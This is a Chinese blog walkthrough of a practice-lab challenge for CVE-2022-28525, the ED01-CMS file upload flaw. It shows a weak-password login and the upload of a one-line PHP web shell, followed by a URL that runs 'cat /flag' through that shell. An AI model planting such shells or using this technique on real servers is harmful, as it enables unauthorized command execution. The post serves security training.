春秋云境靶场CVE-2022-28525

已于 2023-07-20 15:55:31 修改
阅读量198 收藏
点赞数
分类专栏: 春秋云境靶场 文章标签: 安全 web安全
于 2023-07-06 16:14:50 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_52923396/article/details/131577943
版权

CVE-2022-28525 (ED01-CMS v20180505 存在任意文件上传漏洞)

1、访问url

2、尝试弱口令admin/admin登录

 3、因为是任意文件上传漏洞,在各页面查找上传接口

在users/view all users 找到上传页面,

4、点击edit,进行编辑,填写password,并上传文件,使用burpsuit抓包

 

test.php内容如下

<?php system($_GET[cc]);?>

5、send to repeater

 6、审查图片元素发现文件路径在/images/  路径下

7、 访问http://eci-2zeeoly4mjll60mndqll.cloudeci1.ichunqiu.com/images/test.php?cc=cat%20/flag

淤泥下的月亮
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
春秋云境CVE-2022-28525
一只爱吃橙子的羊
11-29 2253
ED01-CMS v20180505 存在任意文件上传漏洞
CVE-2022-28525漏洞复现(超详细宝宝教程)
m0_74968000的博客
12-13 248
在网上下载一个,用来爆破账号和密码。
CVE-2022-28525 春秋云镜
biejianghua的博客
11-28 531
CVE-2022-28525
CVE-2022-28525
龙狼刺的博客
06-07 382
ED01-CMS v20180505 存在任意文件上传漏洞。
春秋云境CVE-2022-28525 (文件上传漏洞)
m0_65712192的博客
04-19 1054
ED01-CMS v20180505 存在任意文件上传漏洞
春秋云境CVE-2022-28525
m0_49025459的博客
05-05 375
ED01-CMS v20180505 存在任意文件上传漏洞。
春秋云境 CVE-2022-4230 夺旗
05-02
介绍如何 利用 CVE-2022-4230 的 WP Statistics WordPress 插件13.2.9 漏洞利用。 漏洞描述:WP Statistics WordPress 插件13.2.9之前的版本不会转义参数,这可能允许经过身份验证的用户执行 SQL 注入攻击。默认...
CVE-2022-33891POC Apache Spark 命令注入(CVE-2022-33891)POC
08-10
CVE-2022-33891POC Apache Spark 命令注入(CVE-2022-33891)POC CVE-2022-33891 影响版本 Apache spark version 3.1.1版本 Apache Spark version>= 3.3.0 修复方案 1.建议升级到安全版本,参考官网链接: ...
CVE-2022-22963 复现Demo
04-14
CVE-2022-22963 复现Demo,A Spring MVC or Spring WebFlux application running on JDK 9+ may be vulnerable to remote code execution (RCE) via data binding. The specific exploit requires the application ...
XStream拒绝服务漏洞(CVE-2022-41966)响应通告
05-05
XStream拒绝服务漏洞(CVE-2022-41966)响应通告
春秋云镜 CVE-2022-28525
qq_22002773的博客
06-27 154
春秋云镜 CVE-2022-28525
ED01-CMS 代码问题漏洞(CVE-2022-28525
千寻的博客
11-27 1105
ED01-CMS v20180505 存在任意文件上传漏洞
ED01-CMS v20180505 (CVE-2022-28525)
qq_45092459的博客
11-26 602
ED01-CMS v20180505(CVE-2022-28525)
春秋云镜wp day1
xy404的博客
10-13 3603
今天看到之前买了内网渗透那本书,今天看到靶场上线了,打一天玩一下,总体cve的洞很好刷,比打CTF轻松多了。
捷配总结的SMT工厂安全防静电规则
最新发布
tyymm的博客
07-17 524
SMT工厂须熟记的安全防静电规则! 安全对于我们非常重要,特别是我们这种SMT加工厂,通常我们所讲的安全是指人身安全。 但这里我们须树立一个较为全面的安全常识就是在强调人身安全的同时亦必须注意设备、产品的安全。 电气: 怎样预防人身触电事故? 1、发现有损坏的开关,电线等电气安全隐患,赶快向有关人员报告处理。2、不懂电气技术的人对电气设备不要乱装、乱拆。3、不要用湿手、湿脚动用电气设备(如: 按开关、按钮)。4、清扫卫生时,不要用湿抹布擦电线、开关按钮,一定要搞卫生,请先断开电
春秋云境CVE-2022-29464
09-05
春秋云境CVE-2022-29464是指WSO2 API Manager 文件上传漏洞的CVE编号。这个漏洞允许攻击者通过上传恶意文件来执行任意代码,进而导致服务器受到攻击。根据引用,在GitHub上有一个项目,其中包含了与该漏洞相关的利用代码和解释。引用提供了一个具体的漏洞利用脚本的地址。如果您想了解更多关于该漏洞的细节和分析,可以参考引用中提到的文章。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *3* [【春秋云境CVE-2022-29464](https://blog.csdn.net/m0_49025459/article/details/130400369)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] - *2* [春秋云境靶场 WSO2文件上传漏洞(CVE-2022-29464)](https://blog.csdn.net/qq_52923396/article/details/131832217)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值